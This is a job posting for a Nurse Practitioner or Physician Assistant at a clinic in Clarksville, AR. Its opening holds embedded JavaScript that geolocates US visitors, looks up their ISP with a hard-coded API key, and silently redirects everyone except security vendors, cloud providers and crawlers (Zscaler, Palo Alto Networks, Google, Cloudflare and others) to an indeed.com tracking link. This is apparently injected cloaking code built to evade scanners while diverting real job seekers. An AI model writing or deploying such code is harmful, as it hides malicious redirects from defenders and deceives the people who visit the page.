Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/175b3bea2377d42d/1d1a7eabefff8fd5691908275a3781138bbb385ec5918e1da88ce746a9979269/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });We are hiring a Nurse Practitioner (NP) or Physician Assistant (PA) for our Urgent/Primary Care clinic in Clarksville, AR.
**Benefits include:**
- Competitive salary
- Potential loan repayment up to $70k for qualifying candidates
- Continuing education credits
- Malpractice insurance
- 401(k), dental, health, life, and vision insurance
- Paid time off, tuition reimbursement, employee assistance program, and discounts
**Qualifications:**
- Licensure in the practicing state
- Family Nurse Practitioner Certification or Physician Assistant preferred
**About Us:**
We provide individualized, high-quality healthcare for patients of all ages, including pediatrics and seniors, across multiple states. Our team is dedicated to delivering compassionate care tailored to each patient’s needs, promoting health and wellness in underserved communities.
**Our Mission:**
To offer accessible, compassionate healthcare 24/7, ensuring patient well-being and comfort with integrity.